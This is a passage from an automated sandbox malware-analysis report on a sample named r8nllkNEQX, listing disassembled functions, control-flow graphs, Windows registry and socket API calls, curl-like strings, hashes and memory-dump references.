                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: Sleepconnect
                                    • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                    • API String ID: 238548546-879669977
                                    • Opcode ID: 3ffe9371a5372a38d93c3abc33d8d48d6c3a50b89b86ee5465512fe0684b160c
                                    • Instruction ID: 0fe857fef83c887ec94dc6a3e7633a8119ccca0f6713fbfb4c95e2ae5964dfb8
                                    • Opcode Fuzzy Hash: 3ffe9371a5372a38d93c3abc33d8d48d6c3a50b89b86ee5465512fe0684b160c
                                    • Instruction Fuzzy Hash: FDB1F470605346EFD716CF24C895BA7B7E4AF55328F048A2CE8998B2D2DB70EC54CB61
                                    Function 002D2F17 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144registryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1481 2d2f17-2d2f8c call 7a1af0 call 7a1ee0 1486 2d31c9-2d31cd 1481->1486 1487 2d2f91-2d2ff4 call 2d1619 RegOpenKeyExA 1486->1487 1488 2d31d3-2d31d6 1486->1488 1491 2d2ffa-2d300b 1487->1491 1492 2d31c5 1487->1492 1493 2d315c-2d31ac RegEnumKeyExA 1491->1493 1492->1486 1494 2d3010-2d3083 call 2d1619 RegOpenKeyExA 1493->1494 1495 2d31b2-2d31c2 RegCloseKey 1493->1495 1498 2d314e-2d3152 1494->1498 1499 2d3089-2d30d4 RegQueryValueExA 1494->1499 1495->1492 1498->1493 1500 2d313b-2d314b RegCloseKey 1499->1500 1501 2d30d6-2d3137 call 7a1dc0 call 7a1e50 call 7a1ee0 call 7a1cf0 call 7a1ee0 call 7a0250 1499->1501 1500->1498 1501->1500
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: CloseEnumOpen
                                    • String ID: d
                                    • API String ID: 1332880857-2564639436
                                    • Opcode ID: bc3906bee84a2f55d39c918e80943435b3f326625209a65f577448714813fe71
                                    • Instruction ID: 5a9b50700b567fa5334d75e24d474be62c6fe91236c3ddd11a92b66a461c2a44
                                    • Opcode Fuzzy Hash: bc3906bee84a2f55d39c918e80943435b3f326625209a65f577448714813fe71
                                    • Instruction Fuzzy Hash: 217191B490431ADFDB40DFA9C58479EBBF0FF85308F108959E99897311E7749A888F92
                                    Function 002D76A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73networkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1514 2d76a0-2d76be 1515 2d76e6-2d76f2 send 1514->1515 1516 2d76c0-2d76c7 1514->1516 1518 2d775e-2d7762 1515->1518 1519 2d76f4-2d7709 call 2d72a0 1515->1519 1516->1515 1517 2d76c9-2d76d1 1516->1517 1520 2d770b-2d7759 call 2d72a0 call 2dcb20 call 658c50 1517->1520 1521 2d76d3-2d76e4 1517->1521 1519->1518 1520->1518 1521->1519
                                    APIs
                                    • send.WS2_32(multi.c,?,?,?,N=-,00000000,?,?,002E07BF), ref: 002D76EA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: send
                                    • String ID: LIMIT %s:%d %s reached memlimit$N=-$SEND %s:%d send(%lu) = %ld$multi.c$send
                                    • API String ID: 2809346765-3403203552
                                    • Opcode ID: 62ce90c9c72c3dbb3d535365638e657ee5a6f0a53c7145b5470d04af1b7c57fe
                                    • Instruction ID: 4a39564b08cc232a74180865a5c20831b4b6c3a31c7a046ae9bdc10f9641fc66
                                    • Opcode Fuzzy Hash: 62ce90c9c72c3dbb3d535365638e657ee5a6f0a53c7145b5470d04af1b7c57fe
                                    • Instruction Fuzzy Hash: F9113DB0A193057BE120AF649C46E677B6CEBC6B28F040A1AFD0463353F269DC21C6B1
                                    Function 00309290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1633 309290-3092ed call 2d76a0 1636 3093c3-3093ce 1633->1636 1637 3092f3-3092fb 1633->1637 1646 3093d0-3093e1 1636->1646 1647 3093e5-309427 call 2ed090 call 314f40 1636->1647 1638 309301-309333 call 2ed8c0 call 2ed9a0 1637->1638 1639 3093aa-3093af 1637->1639 1658 309335-309364 WSAIoctl 1638->1658 1659 3093a7 1638->1659 1640 3093b5-3093bc 1639->1640 1641 309456-309470 1639->1641 1644 309429-309431 1640->1644 1645 3093be 1640->1645 1649 309433-309437 1644->1649 1650 309439-30943f 1644->1650 1645->1641 1646->1640 1651 3093e3 1646->1651 1647->1641 1647->1644 1649->1641 1649->1650 1650->1641 1654 309441-309453 call 3150a0 1650->1654 1651->1641 1654->1641 1663 309366-30936f 1658->1663 1664 30939b-3093a4 1658->1664 1659->1639 1663->1664 1665 309371-309390 setsockopt 1663->1665 1664->1659 1665->1664 1666 309392-309395 1665->1666 1666->1664
                                    APIs
                                    • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0030935C
                                    • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00309388
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: Ioctlsetsockopt
                                    • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                    • API String ID: 1903391676-2691795271
                                    • Opcode ID: 3e8aa00cfbde2ac8b43befa9649da947c8a22d30eaba5aa3db197d24ccf748c0
                                    • Instruction ID: 43ea83007ac24017e03169a8f12653ee0fb33be20adfdb26b2aed800c8f6cce0
                                    • Opcode Fuzzy Hash: 3e8aa00cfbde2ac8b43befa9649da947c8a22d30eaba5aa3db197d24ccf748c0
                                    • Instruction Fuzzy Hash: F4510174604305ABD712DF24C891FAAB7A5FF88314F15856AFD488B2D3E730E992CB91
                                    Function 002D7770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1667 2d7770-2d778e 1668 2d77b6-2d77c2 recv 1667->1668 1669 2d7790-2d7797 1667->1669 1671 2d782e-2d7832 1668->1671 1672 2d77c4-2d77d9 call 2d72a0 1668->1672 1669->1668 1670 2d7799-2d77a1 1669->1670 1673 2d77db-2d7829 call 2d72a0 call 2dcb20 call 658c50 1670->1673 1674 2d77a3-2d77b4 1670->1674 1672->1671 1673->1671 1674->1672
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: recv
                                    • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                    • API String ID: 1507349165-640788491
                                    • Opcode ID: b207039796bc14599fe94fe75bd13d7071c359de182f6feb7e09871eb62d57dd
                                    • Instruction ID: c85df163ea9edd3df6f9488b7cd44ff7b6fcf9fc7d341dd42e65f9a4ddaac1b7
                                    • Opcode Fuzzy Hash: b207039796bc14599fe94fe75bd13d7071c359de182f6feb7e09871eb62d57dd
                                    • Instruction Fuzzy Hash: 91117DB46283047BE110EF549C4AE677B5CEFC6B28F000A1AFD0493352E2659C21C6B1
                                    Function 002D75E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1686 2d75e0-2d75ed 1687 2d75ef-2d75f6 1686->1687 1688 2d7607-2d7629 socket 1686->1688 1687->1688 1689 2d75f8-2d75ff 1687->1689 1690 2d763f-2d7642 1688->1690 1691 2d762b-2d763c call 2d72a0 1688->1691 1692 2d7601-2d7602 1689->1692 1693 2d7643-2d7699 call 2d72a0 call 2dcb20 call 658c50 1689->1693 1691->1690 1692->1688
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: socket
                                    • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                    • API String ID: 98920635-842387772
                                    • Opcode ID: 3b3f37b5fb1c40b1d11178fcc33dccc7cf2ca8614c309a2b392795203f591b48
                                    • Instruction ID: 7588ffe88885cc8030be724ea48c00b22c186263c1d34ebe99f9e5f6b4038b5b
                                    • Opcode Fuzzy Hash: 3b3f37b5fb1c40b1d11178fcc33dccc7cf2ca8614c309a2b392795203f591b48
                                    • Instruction Fuzzy Hash: 5F115971A1421237D620AF6CAC06FDB3B98EF86724F040922F810D23A3E215CC76C7E0
                                    Function 00658E90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1871 658e90-658eb8 _open 1872 658eff-658f2c call 659f70 1871->1872 1873 658eba-658ec7 1871->1873 1881 658f39-658f51 call 658ca8 1872->1881 1875 658ef3-658efa call 658d20 1873->1875 1876 658ec9 1873->1876 1875->1872 1878 658ee2-658ef1 1876->1878 1879 658ecb-658ecd 1876->1879 1878->1875 1878->1876 1882 658ed3-658ed6 1879->1882 1883 7a99b0-7a99c7 1879->1883 1889 658f30-658f37 1881->1889 1890 658f53-658f5e call 658cc0 1881->1890 1882->1878 1887 658ed8 1882->1887 1885 7a99ca-7a99f1 1883->1885 1886 7a99c9 1883->1886 1891 7a99f9-7a99ff 1885->1891 1887->1878 1889->1881 1889->1890 1890->1873 1893 7a9a19-7a9a3b 1891->1893 1894 7a9a01-7a9a0f 1891->1894 1898 7a9a3d-7a9a44 1893->1898 1899 7a9a46-7a9a5b 1893->1899 1895 7a9a15-7a9a18 1894->1895 1898->1899 1900 7a9a5d-7a9a72 1898->1900 1899->1894 1900->1895
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: _open
                                    • String ID: terminated$@
                                    • API String ID: 4183159743-3016906910
                                    • Opcode ID: e573d07b775a1c647dc8b336c8503d36f4a09693b2d51cceb847593cb2880f49
                                    • Instruction ID: d31d9bb64fdb38e768079f9ee6c583486f41ff3be270d1d65523b67524fd4e4c
                                    • Opcode Fuzzy Hash: e573d07b775a1c647dc8b336c8503d36f4a09693b2d51cceb847593cb2880f49
                                    • Instruction Fuzzy Hash: 13413CB09043059FCB10EFB9D4456AEBBF5AF89355F108A2DE898E7340E734D849CB56
                                    Function 0030A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1903 30a150-30a159 1904 30a250 1903->1904 1905 30a15f-30a17b 1903->1905 1906 30a181-30a1ce getsockname 1905->1906 1907 30a249-30a24f 1905->1907 1908 30a1d0-30a1f5 call 2ed090 1906->1908 1909 30a1f7-30a214 call 30ef30 1906->1909 1907->1904 1916 30a240-30a246 call 314f40 1908->1916 1909->1907 1914 30a216-30a23b call 2ed090 1909->1914 1914->1916 1916->1907
                                    APIs
                                    • getsockname.WS2_32(?,?,00000080), ref: 0030A1C7
                                    Strings
                                    • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0030A23B
                                    • getsockname() failed with errno %d: %s, xrefs: 0030A1F0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: getsockname
                                    • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                    • API String ID: 3358416759-2605427207
                                    • Opcode ID: 594c32d2c81050ca1e6651754cae2669e225f86f6452ca7d0759b74063be13af
                                    • Instruction ID: d307b11beb1351232ed46937ae26f9b9444d7e9dd74fd617d401b064cc9d7b9c
                                    • Opcode Fuzzy Hash: 594c32d2c81050ca1e6651754cae2669e225f86f6452ca7d0759b74063be13af
                                    • Instruction Fuzzy Hash: E421DB71948780A6E6269B19EC46FE773BCEF91324F040614F99853191FB3259868AD2
                                    Function 002ED5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1923 2ed5e0-2ed5ee 1924 2ed652-2ed662 WSAStartup 1923->1924 1925 2ed5f0-2ed604 call 2ed690 1923->1925 1926 2ed664-2ed66f 1924->1926 1927 2ed670-2ed676 1924->1927 1931 2ed61b-2ed651 call 2f7620 1925->1931 1932 2ed606-2ed614 1925->1932 1927->1925 1930 2ed67c-2ed68d 1927->1930 1932->1931 1937 2ed616 1932->1937 1937->1931
                                    APIs
                                    • WSAStartup.WS2_32(00000202), ref: 002ED65B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
